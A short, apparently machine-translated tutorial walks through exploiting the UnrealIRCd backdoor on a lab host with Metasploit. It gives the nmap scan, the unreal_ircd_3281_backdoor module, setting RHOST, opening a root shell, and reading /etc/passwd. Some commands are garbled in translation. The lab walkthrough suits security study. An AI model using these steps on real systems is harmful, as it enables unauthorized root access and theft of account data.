Shulou(Shulou.com)06/01 Report--

Metasploit overflow UnrealIRCd backdoor vulnerability

Take advantage of the UnrealIRCd backdoor vulnerability to obtain root permissions of the target host.

The UnrealIRCd of some sites contains externally introduced malicious code in the DEBUG3_DOLOG_SYSTEM macro, and remote users can execute arbitrary code.

First, use nmap tools to scan the target host

1.1 scan the target host using the nmap command. Click in the space on the desktop, right-click the menu and choose Open in Terminal.

1.2 enter the command "nmap-sV 192.168.1.3" in the terminal, scan the port of the target host, and find that port 6667 is open, and the corresponding service is unreal ircd.

1.3 enter the command "msfconsole" in the terminal to start the MSF terminal.

1.4 enter the command "search unreal ircd" in the terminal to search for ircd related tools and * payloads.

1.5 enter the command "use exploit/unix/irc/unreal_ircd_3281_backdoor" in the terminal to enable the exploit module, and the prompt will prompt you to enter the path.

1.6 enter the command "show options" in the terminal to view the relevant items that need to be set. "yes" indicates the parameters that must be filled in.

1.7 enter the command "set RHOST 192.168.1.3" in the terminal to set the IP address of the target host.

1.8 enter "exploit" in the terminal to start a shell session to the target host *, *.

1.9 enter "whoami" in the terminal, check that the permission obtained is root, enter the command "cat / etc/passwd", and view the account number and password of the system.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.